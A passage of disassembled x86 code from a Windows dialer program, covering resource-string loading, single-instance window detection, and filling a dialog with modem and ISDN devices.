loc_405A1F: ; CODE XREF: sub_405830+1A3�j
; sub_405830+1EA�j
push 0Ah
push ebx
lea ecx, [ebp+var_60]
call sub_40A2D0
push eax
call sub_40B26C
add esp, 0Ch
mov ecx, edi
call sub_409420
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_405A4D
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405A4D: ; CODE XREF: sub_405830+20F�j
mov eax, [ebp+var_60]
push eax ; bstrString
call ds:SysFreeString
jmp short loc_405A67
; ---------------------------------------------------------------------------
loc_405A59: ; CODE XREF: sub_405830+152�j
lea ecx, [ebp+var_8C]
push ecx ; int
mov ecx, edi ; int
call sub_408D50
loc_405A67: ; CODE XREF: sub_405830+227�j
lea ecx, [ebp+var_8C]
call sub_408C20
mov esi, [ebp+var_4]
loc_405A75: ; CODE XREF: sub_405830+123�j
mov edx, [esi+1Ch]
push 6Eh ; uID
push edx ; hInstance
mov ecx, edi
call sub_4093B0
push 1
mov ecx, edi
call sub_4092F0
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C70
push 1
mov ecx, edi
call sub_409330
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C90
mov ecx, dword_40FBC8
push offset dword_40FBD8 ; lpString2
call sub_409C20
push 1
mov ecx, edi
call sub_409370
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C40
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
mov eax, [esi+1Ch]
lea ecx, [ebp+psz]
push 200h ; cchBufferMax
push ecx ; lpBuffer
push 77h ; uID
push eax ; hInstance
mov [ebp+bstrString], ebx
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov edi, eax
push edx ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz short loc_405B62
lea eax, [ebp+psz]
test eax, eax
jnz short loc_405B1E
xor edi, edi
push edi ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_405B65
; ---------------------------------------------------------------------------
loc_405B1E: ; CODE XREF: sub_405830+2DE�j
lea ecx, [ebp+psz]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea edx, [ebp+psz]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [edi], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov esi, [ebp+var_4]
push edi ; psz
call ds:SysAllocString
mov [ebp+bstrString], eax
jmp short loc_405B65
; ---------------------------------------------------------------------------
loc_405B62: ; CODE XREF: sub_405830+2D4�j
mov [ebp+bstrString], ebx
loc_405B65: ; CODE XREF: sub_405830+2EC�j
; sub_405830+330�j
lea ecx, [ebp+bstrString]
call sub_40A2D0
mov edi, eax
push edi ; lpString
call ds:lstrlenA ; lstrlenA
cmp eax, ebx
jbe short loc_405B83
cmp byte ptr [edi], 31h
jnz short loc_405B83
mov cl, 1
jmp short loc_405B85
; ---------------------------------------------------------------------------
loc_405B83: ; CODE XREF: sub_405830+348�j
; sub_405830+34D�j
xor cl, cl
loc_405B85: ; CODE XREF: sub_405830+351�j
cmp eax, 1
mov [esi+4Ch], cl
jbe short loc_405B97
cmp byte ptr [edi+1], 31h
jnz short loc_405B97
mov al, 1
jmp short loc_405B99
; ---------------------------------------------------------------------------
loc_405B97: ; CODE XREF: sub_405830+35B�j
; sub_405830+361�j
xor al, al
loc_405B99: ; CODE XREF: sub_405830+365�j
mov [esi+4Dh], al
mov eax, [ebp+var_30]
cmp eax, ebx
jz short loc_405BAF
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_30], ebx
loc_405BAF: ; CODE XREF: sub_405830+371�j
mov eax, [ebp+bstrString]
push eax ; bstrString
call ds:SysFreeString
lea esp, [ebp-298h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_405830 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405BD0 proc near ; CODE XREF: sub_405C90+25�p
lParam = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 0Ch
push esi
mov esi, ecx
push 0FFFFFFE0h ; nIndex
mov byte ptr [esp+14h+lParam], 0
mov eax, [esi+4]
push eax ; hWnd
call ds:GetClassWord ; GetClassWord
mov ecx, [esi+4]
push 0FFFFFFEBh ; nIndex
push ecx ; hWnd
mov word ptr [esp+18h+lParam+2], ax
call ds:GetWindowLongA ; GetWindowLongA
mov edx, [esi+4]
mov [esp+10h+var_8], eax
lea eax, [esp+10h+lParam]
mov [esp+10h+var_4], edx
push eax ; lParam
push offset EnumFunc ; lpEnumFunc
call ds:EnumWindows ; EnumWindows
mov al, byte ptr [esp+10h+lParam]
pop esi
add esp, 0Ch
retn
sub_405BD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; BOOL __stdcall EnumFunc(HWND,LPARAM)
EnumFunc proc near ; DATA XREF: sub_405BD0+38�o
hWnd = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+hWnd]
push edi
mov edi, [esp+8+arg_4]
cmp [edi+8], esi
jz short loc_405C7A
push 0FFFFFFE0h ; nIndex
push esi ; hWnd
call ds:GetClassWord ; GetClassWord
cmp [edi+2], ax
jnz short loc_405C7A
push 0FFFFFFEBh ; nIndex
push esi ; hWnd
call ds:GetWindowLongA ; GetWindowLongA
cmp [edi+4], eax
jnz short loc_405C7A
mov byte ptr [edi], 1
mov al, ds:byte_40D718
test al, al
jz short loc_405C5C
push 0
jmp short loc_405C5E
; ---------------------------------------------------------------------------
loc_405C5C: ; CODE XREF: EnumFunc+36�j
push 5 ; nCmdShow
loc_405C5E: ; CODE XREF: EnumFunc+3A�j
push esi ; hWnd
call ds:ShowWindow ; ShowWindow
push esi ; hWnd
call ds:SetForegroundWindow ; SetForegroundWindow
push esi ; hWnd
call ds:SetFocus ; SetFocus
pop edi
xor eax, eax
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_405C7A: ; CODE XREF: EnumFunc+D�j EnumFunc+1C�j ...
pop edi
mov eax, 1
pop esi
retn 8
EnumFunc endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __thiscall sub_405C90(int,int,int,int,int)
sub_405C90 proc near ; CODE XREF: sub_402180+35�p
String = byte ptr -298h
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
var_6E = byte ptr -6Eh
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_42 = byte ptr -42h
var_40 = dword ptr -40h
bstrString = dword ptr -3Ch
lpMem = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_12 = byte ptr -12h
lParam = dword ptr -10h
var_C = dword ptr -0Ch
psz = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 298h
push ebx
push esi
mov esi, ecx
push edi
push 12345h ; dwNewLong
push 0FFFFFFEBh ; nIndex
mov eax, [esi+4]
mov byte ptr [esi+4Eh], 1
push eax ; hWnd
call ds:SetWindowLongA ; SetWindowLongA
mov ecx, esi
call sub_405BD0
test al, al
jz short loc_405CD9
mov ecx, esi
call sub_405180
mov eax, 1
lea esp, [ebp-2A4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_405CD9: ; CODE XREF: sub_405C90+2C�j
mov eax, [esi+1Ch]
lea ecx, [ebp+String]
push 200h ; cchBufferMax
push ecx ; lpBuffer
xor ebx, ebx
push 66h ; uID
push eax ; hInstance
mov [ebp+var_1], bl
mov [ebp+bstrString], ebx
mov [ebp+lpMem], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], bl
mov [ebp+var_12], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+bstrString]
mov edi, eax
push edx ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz loc_405DCF
lea eax, [ebp+String]
test eax, eax
jz short loc_405D5E
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push edi ; cchWideChar
push eax ; lpWideCharStr
lea edx, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [ebp+psz], eax
mov [eax], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [ebp+psz]
loc_405D5E: ; CODE XREF: sub_405C90+91�j
push eax ; psz
call ds:SysAllocString
lea ecx, [ebp+bstrString]
mov [ebp+bstrString], eax
call sub_40A2D0
cmp byte ptr [eax], 25h
setnz [ebp+var_1]
loc_405D77: ; CODE XREF: sub_405C90+142�j
mov eax, [ebp+bstrString]
mov edi, ds:SysFreeString
push eax ; bstrString
call edi ; SysFreeString
mov al, [ebp+var_1]
mov [ebp+bstrString], ebx
cmp al, 1
jz short loc_405DD4
mov ecx, lpFile
push ecx ; lpFile
mov ecx, esi
call sub_404FF0
mov ecx, esi
call sub_405180
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_405DB5
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405DB5: ; CODE XREF: sub_405C90+117�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call edi ; SysFreeString
mov eax, 1
lea esp, [ebp-2A4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_405DCF: ; CODE XREF: sub_405C90+83�j
mov [ebp+bstrString], ebx
jmp short loc_405D77
; ---------------------------------------------------------------------------
loc_405DD4: ; CODE XREF: sub_405C90+FB�j
mov ecx, esi
mov [esi+5Ch], ebx
mov [esi+54h], bl
mov [esi+55h], bl
mov [esi+56h], bl
call sub_407EC0
mov ecx, esi
mov [esi+58h], ebx
call sub_408980
mov edx, eax
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
mov [esi+58h], edx
repne scasb
not ecx
dec ecx
jz short loc_405E38
mov eax, offset aXx ; "xx"
mov edi, edx
loc_405E0B: ; CODE XREF: sub_405C90+199�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_405E2F
cmp cl, bl
jz short loc_405E2B
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_405E2F
add edi, 2
add eax, 2
cmp cl, bl
jnz short loc_405E0B
loc_405E2B: ; CODE XREF: sub_405C90+185�j
xor eax, eax
jmp short loc_405E34
; ---------------------------------------------------------------------------
loc_405E2F: ; CODE XREF: sub_405C90+181�j
; sub_405C90+18F�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_405E34: ; CODE XREF: sub_405C90+19D�j
cmp eax, ebx
jnz short loc_405EA7
loc_405E38: ; CODE XREF: sub_405C90+172�j
mov ecx, esi
call sub_406E60
test eax, eax
jge short loc_405E63
push 73h ; uID
mov ecx, esi
call sub_405020
mov ecx, esi
call sub_405180
mov eax, [ebp+lpMem]
cmp eax, ebx
jz loc_405F4F
jmp loc_405F43
; ---------------------------------------------------------------------------
loc_405E63: ; CODE XREF: sub_405C90+1B1�j
mov ecx, esi
call sub_408980
mov [esi+58h], eax
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
jnz short loc_405EA7
push 73h ; uID
mov ecx, esi
call sub_405020
mov ecx, esi
call sub_405180
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_405E9E
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405E9E: ; CODE XREF: sub_405C90+200�j
mov ecx, [ebp+bstrString]
push ecx
jmp loc_405F53
; ---------------------------------------------------------------------------
loc_405EA7: ; CODE XREF: sub_405C90+1A6�j
; sub_405C90+1E9�j
push 5FCh ; dwBytes
call sub_40AF50
add esp, 4
cmp eax, ebx
jz short loc_405F26
mov ecx, eax
call sub_4094A0
cmp eax, ebx
mov dword_40FBC8, eax
jz short loc_405F2C
mov ecx, eax
call sub_409520
test al, al
jz short loc_405F2C
mov ecx, esi
call sub_405830
mov eax, [esi+1Ch]
lea edx, [ebp+String]
push 200h ; cchBufferMax
push edx ; lpBuffer
push 75h ; uID
push eax ; hInstance
mov [ebp+var_6C], ebx
mov [ebp+var_68], ebx
mov [ebp+var_64], ebx
mov [ebp+var_60], bl
mov [ebp+var_42], bl
call ds:LoadStringA ; LoadStringA
mov edi, eax
mov eax, [ebp+var_6C]
push eax ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz loc_406003
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_405F6D
xor eax, eax
jmp loc_405FA8
; ---------------------------------------------------------------------------
loc_405F26: ; CODE XREF: sub_405C90+226�j
mov dword_40FBC8, ebx
loc_405F2C: ; CODE XREF: sub_405C90+236�j
; sub_405C90+241�j
push 73h ; uID
mov ecx, esi
call sub_405020
mov ecx, esi
call sub_405180
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_405F4F
loc_405F43: ; CODE XREF: sub_405C90+1CE�j
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_405F4F: ; CODE XREF: sub_405C90+1C8�j
; sub_405C90+2B1�j
mov eax, [ebp+bstrString]
push eax ; bstrString
loc_405F53: ; CODE XREF: sub_405C90+212�j
call ds:SysFreeString
mov eax, 1
lea esp, [ebp-2A4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_405F6D: ; CODE XREF: sub_405C90+28D�j
lea edx, [ebp+String]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push edi ; cchWideChar
mov [ebp+psz], eax
push eax ; lpWideCharStr
mov [eax], bx
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [ebp+psz]
loc_405FA8: ; CODE XREF: sub_405C90+291�j
push eax ; psz
call ds:SysAllocString
cmp eax, ebx
mov [ebp+var_6C], eax
jz short loc_405FC5
push eax ; BSTR
call ds:SysStringLen
test eax, eax
jnz loc_406052
loc_405FC5: ; CODE XREF: sub_405C90+324�j
; sub_405C90+376�j
mov eax, [esi+1Ch]
lea ecx, [ebp+String]
push 200h ; cchBufferMax
push ecx ; lpBuffer
push 76h ; uID
push eax ; hInstance
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+var_6C]
mov edi, eax
push edx ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz short loc_40604F
lea eax, [ebp+String]
test eax, eax
jnz short loc_406008
push eax ; psz
call ds:SysAllocString
mov [ebp+var_6C], eax
jmp short loc_406052
; ---------------------------------------------------------------------------
loc_406003: ; CODE XREF: sub_405C90+27F�j
mov [ebp+var_6C], ebx
jmp short loc_405FC5
; ---------------------------------------------------------------------------
loc_406008: ; CODE XREF: sub_405C90+365�j
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push edi ; cchWideChar
push eax ; lpWideCharStr
lea edx, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [ebp+psz], eax
mov [eax], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [ebp+psz]
push eax ; psz
call ds:SysAllocString
mov [ebp+var_6C], eax
jmp short loc_406052
; ---------------------------------------------------------------------------
loc_40604F: ; CODE XREF: sub_405C90+35B�j
mov [ebp+var_6C], ebx
loc_406052: ; CODE XREF: sub_405C90+32F�j
; sub_405C90+371�j ...
lea ecx, [ebp+var_6C]
call sub_40A2D0
push eax ; lpString
mov eax, [esi+4]
push eax ; hWnd
call ds:SetWindowTextA ; SetWindowTextA
push 385h ; uID
push 1 ; nIDDlgItem
mov ecx, esi
call sub_405680
push 70h ; uID
push 0CDh ; nIDDlgItem
mov ecx, esi
call sub_405680
mov eax, [esi+1Ch]
lea ecx, [ebp+String]
push 200h ; cchBufferMax
push ecx ; lpBuffer
push 7Ah ; uID
push eax ; hInstance
mov [ebp+var_98], ebx
mov [ebp+var_94], ebx
mov [ebp+var_90], ebx
mov [ebp+var_8C], bl
mov [ebp+var_6E], bl
call ds:LoadStringA ; LoadStringA
mov edx, [ebp+var_98]
mov edi, eax
push edx ; bstrString
call ds:SysFreeString
cmp edi, ebx
jz short loc_40612A
lea eax, [ebp+String]
test eax, eax
jnz short loc_4060E0
push eax ; psz
call ds:SysAllocString
mov [ebp+var_98], eax
jmp short loc_406130
; ---------------------------------------------------------------------------
loc_4060E0: ; CODE XREF: sub_405C90+43F�j
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov edi, eax
inc edi
lea eax, [edi+edi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, esp
push edi ; cchWideChar
push eax ; lpWideCharStr
lea edx, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; dwFlags
push ebx ; CodePage
mov [ebp+psz], eax
mov [eax], bx
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [ebp+psz]
push eax ; psz
call ds:SysAllocString
mov [ebp+var_98], eax
jmp short loc_406130
; ---------------------------------------------------------------------------
loc_40612A: ; CODE XREF: sub_405C90+435�j
mov [ebp+var_98], ebx
loc_406130: ; CODE XREF: sub_405C90+44E�j
; sub_405C90+498�j
cmp [esi+4Dh], bl
jz short loc_406140
mov ecx, dword_40FBC8
call sub_40A2C0
loc_406140: ; CODE XREF: sub_405C90+4A3�j
lea ecx, [ebp+var_98]
call sub_40A2D0
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409840
test eax, eax
jz loc_4061EC
push 1F9h ; uID
call ds:GetLastError
push eax ; int
push 27Dh ; lpString
push offset Mem ; "D:\\Work\\Splendo\\Dialer\\working\\dialer h"...
push esi ; int
call sub_4051A0
mov eax, [ebp+var_94]
add esp, 14h
cmp eax, ebx
jz short loc_406197
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_94], ebx
loc_406197: ; CODE XREF: sub_405C90+4F6�j
mov eax, [ebp+var_98]
mov esi, ds:SysFreeString
push eax ; bstrString
call esi ; SysFreeString
mov eax, [ebp+var_68]
cmp eax, ebx
jz short loc_4061B9
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_68], ebx
loc_4061B9: ; CODE XREF: sub_405C90+51B�j
mov ecx, [ebp+var_6C]
push ecx ; bstrString
call esi ; SysFreeString
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_4061D2
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_4061D2: ; CODE XREF: sub_405C90+534�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call esi ; SysFreeString
mov eax, 1
lea esp, [ebp-2A4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4061EC: ; CODE XREF: sub_405C90+4C9�j
mov ecx, dword_40FBC8
call sub_409B80
mov ecx, dword_40FBC8
mov [ebp+lParam], eax
call sub_409710
cmp eax, ebx
mov [ebp+var_40], eax
mov [ebp+var_1], bl
mov [ebp+psz], 0FFFFFFFFh
jg short loc_40628B
mov ecx, esi
call sub_405180
mov eax, [ebp+var_94]
cmp eax, ebx
jz short loc_406236
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_94], ebx
loc_406236: ; CODE XREF: sub_405C90+595�j
mov eax, [ebp+var_98]
mov esi, ds:SysFreeString
push eax ; bstrString
call esi ; SysFreeString
mov eax, [ebp+var_68]
cmp eax, ebx
jz short loc_406258
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_68], ebx
loc_406258: ; CODE XREF: sub_405C90+5BA�j
mov ecx, [ebp+var_6C]
push ecx ; bstrString
call esi ; SysFreeString
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_406271
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_406271: ; CODE XREF: sub_405C90+5D3�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call esi ; SysFreeString
mov eax, 1
lea esp, [ebp-2A4h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_40628B: ; CODE XREF: sub_405C90+584�j
cmp eax, ebx
mov [ebp+var_C], ebx
jle loc_40636A
loc_406296: ; CODE XREF: sub_405C90+6CF�j
mov eax, [ebp+var_C]
mov ecx, dword_40FBC8
push eax
call sub_4097B0
mov edi, eax
push offset aModem ; "modem"
push edi ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz short loc_4062CB
push offset aIsdn ; "isdn"
push edi ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_406353
loc_4062CB: ; CODE XREF: sub_405C90+625�j
mov ecx, [ebp+var_C]
push ecx
mov ecx, dword_40FBC8
call sub_409780
mov edx, [esi+4]
mov edi, eax
push edi ; lParam
push ebx ; wParam
push 143h ; Msg
push 0C9h ; nIDDlgItem
push edx ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
cmp [ebp+psz], 0FFFFFFFFh
jnz short loc_4062FE
mov eax, [ebp+var_C]
mov [ebp+psz], eax
loc_4062FE: ; CODE XREF: sub_405C90+666�j
mov ecx, [ebp+lParam]
cmp [ecx], bl
jnz short loc_406322
mov edx, [ebp+var_C]
mov ecx, dword_40FBC8
push edx
call sub_409720
mov ecx, dword_40FBC8
call sub_409B80
mov [ebp+lParam], eax
loc_406322: ; CODE XREF: sub_405C90+673�j
cmp [ebp+var_1], bl
jnz short loc_406353
mov eax, [ebp+lParam]
push edi ; lpString2
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_406353
mov ecx, [ebp+lParam]
mov edx, [esi+4]
push ecx ; lParam
push ebx ; wParam
push 14Dh ; Msg
push 0C9h ; nIDDlgItem
push edx ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
mov [ebp+var_1], 1
loc_406353: ; CODE XREF: sub_405C90+635�j
; sub_405C90+695�j ...
mov eax, [ebp+var_C]
mov ecx, [ebp+var_40]
inc eax
cmp eax, ecx
mov [ebp+var_C], eax
jl loc_406296
cmp [ebp+var_1], bl
jnz short loc_40639A
loc_40636A: ; CODE XREF: sub_405C90+600�j
mov eax, [ebp+psz]
mov ecx, dword_40FBC8
push eax
call sub_409720
mov ecx, dword_40FBC8
call sub_409B80
mov ecx, [esi+4]
push eax ; lParam
push ebx ; wParam
push 14Dh ; Msg
push 0C9h ; nIDDlgItem
push ecx ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_40639A: ; CODE XREF: sub_405C90+6D8�j
lea ecx, [esi+20h]
call sub_4092B0
mov edx, [esi+4]
push ebx ; lParam
push 2 ; wParam
push 0C5h ; Msg
push 0CEh ; nIDDlgItem
push edx ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
mov ecx, dword_40FBC8
call sub_409C10
push eax ; lpString
push 0CEh ; nIDDlgItem
mov ecx, esi
call sub_4057A0
mov eax, [esi+4]
mov edi, ds:GetDlgItem
push 0CEh ; nIDDlgItem
push eax ; hDlg
call edi ; GetDlgItem
push 1 ; bEnable
push eax ; hWnd
call ds:EnableWindow ; EnableWindow
mov ecx, [esi+4]
push 0C9h ; nIDDlgItem
push ecx ; hDlg
call edi ; GetDlgItem
push 1 ; bEnable
push eax ; hWnd
call ds:EnableWindow ; EnableWindow
mov edx, [esi+4]
push 1 ; nIDDlgItem
push edx ; hDlg
call edi ; GetDlgItem
push 1 ; bEnable
push eax ; hWnd
call ds:EnableWindow ; EnableWindow
mov eax, [esi+4]
push 0CEh ; nIDDlgItem
push eax ; hDlg
call edi ; GetDlgItem
push eax ; hWnd
call ds:SetFocus ; SetFocus
mov ecx, [esi+1Ch]
push ebx ; fuLoad
push ebx ; cy
push ebx ; cx
push 1 ; type
push 32h ; name
push ecx ; hInst
call ds:LoadImageA ; LoadImageA
mov edx, [esi+4]
push eax ; lParam
push 1 ; wParam
push 80h ; Msg
push edx ; hWnd
call ds:SendMessageA ; SendMessageA
mov ecx, dword_40FBC8
call sub_4099D0
mov ecx, esi
call sub_4086F0
cmp [esi+4Ch], bl
jz short loc_40646C
push ebx ; lParam
push ebx ; wParam
push 0F5h ; Msg
push 1 ; nIDDlgItem
mov ecx, esi
call sub_404FC0
loc_40646C: ; CODE XREF: sub_405C90+7CA�j
mov eax, [ebp+var_94]
mov [esi+4Eh], bl
cmp eax, ebx
jz short loc_406488
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_94], ebx
loc_406488: ; CODE XREF: sub_405C90+7E7�j
mov eax, [ebp+var_98]
mov esi, ds:SysFreeString
push eax ; bstrString
call esi ; SysFreeString
mov eax, [ebp+var_68]
cmp eax, ebx
jz short loc_4064AA
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+var_68], ebx
loc_4064AA: ; CODE XREF: sub_405C90+80C�j
mov ecx, [ebp+var_6C]
push ecx ; bstrString
call esi ; SysFreeString
mov eax, [ebp+lpMem]
cmp eax, ebx
jz short loc_4064C3
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [ebp+lpMem], ebx
loc_4064C3: ; CODE XREF: sub_405C90+825�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call esi ; SysFreeString
lea esp, [ebp-2A4h]
xor eax, eax
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_405C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4064E0 proc near ; CODE XREF: sub_402180+7A�p
push ebx
push esi
mov esi, ecx
xor ebx, ebx
mov eax, [esi+5Ch]
cmp eax, ebx
jz short loc_40650C
cmp eax, 2
jle short loc_406556
cmp eax, 7
jg short loc_406556
push 386h ; uID
push 1 ; nIDDlgItem
mov dword ptr [esi+5Ch], 8
call sub_405680
jmp short loc_406544
; ---------------------------------------------------------------------------
loc_40650C: ; CODE XREF: sub_4064E0+B�j
mov cl, byte_40F3B8
push ebx ; lParam
neg cl
sbb ecx, ecx
push ebx ; wParam
and ecx, 0FFFFFFFEh
push 184h ; Msg
add ecx, 3
push 0CCh ; nIDDlgItem
mov [esi+5Ch], ecx
mov byte_40F3B8, bl
mov edx, [esi+4]
mov [esi+54h], bl
push edx ; hDlg
mov [esi+55h], bl
mov [esi+56h], bl
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_406544: ; CODE XREF: sub_4064E0+2A�j
mov eax, [esi+4]
push ebx ; lpTimerFunc
push 0FAh ; uElapse
push 1 ; nIDEvent
push eax ; hWnd
call ds:SetTimer ; SetTimer
loc_406556: ; CODE XREF: sub_4064E0+10�j
; sub_4064E0+15�j
pop esi
xor eax, eax
pop ebx
retn 10h
sub_4064E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_406560(int,LPCWSTR lpString,int)
sub_406560 proc near ; CODE XREF: sub_406670+4E�p
; sub_406720+1D5�p ...
String = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpString = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 204h
mov edx, [ebp+lpString]
mov ecx, [ecx+1Ch]
push ebx
push esi
push edi
lea eax, [ebp+String]
push 200h ; cchBufferMax
add edx, 24B8h
push eax ; lpBuffer
push edx ; uID
push ecx ; hInstance
call ds:LoadStringA ; LoadStringA
mov ebx, [ebp+arg_8]
mov esi, eax
mov [ebp+var_4], esi
mov eax, [ebx]
push eax ; bstrString
call ds:SysFreeString
test esi, esi
jz short loc_4065FB
lea ecx, [ebp+String]
test ecx, ecx
jnz short loc_4065B6
xor edi, edi
push edi ; psz
call ds:SysAllocString
jmp short loc_4065FD
; ---------------------------------------------------------------------------
loc_4065B6: ; CODE XREF: sub_406560+49�j
lea edx, [ebp+String]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea eax, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov esi, [ebp+var_4]
push edi ; psz
call ds:SysAllocString
jmp short loc_4065FD
; ---------------------------------------------------------------------------
loc_4065FB: ; CODE XREF: sub_406560+3F�j
xor eax, eax
loc_4065FD: ; CODE XREF: sub_406560+54�j
; sub_406560+99�j
test esi, esi
mov [ebx], eax
jz short loc_40664B
push eax ; BSTR
call ds:SysStringLen
mov ecx, [ebx]
push eax ; ui
push ecx ; strIn
call ds:SysAllocStringLen
mov edx, [ebp+arg_0]
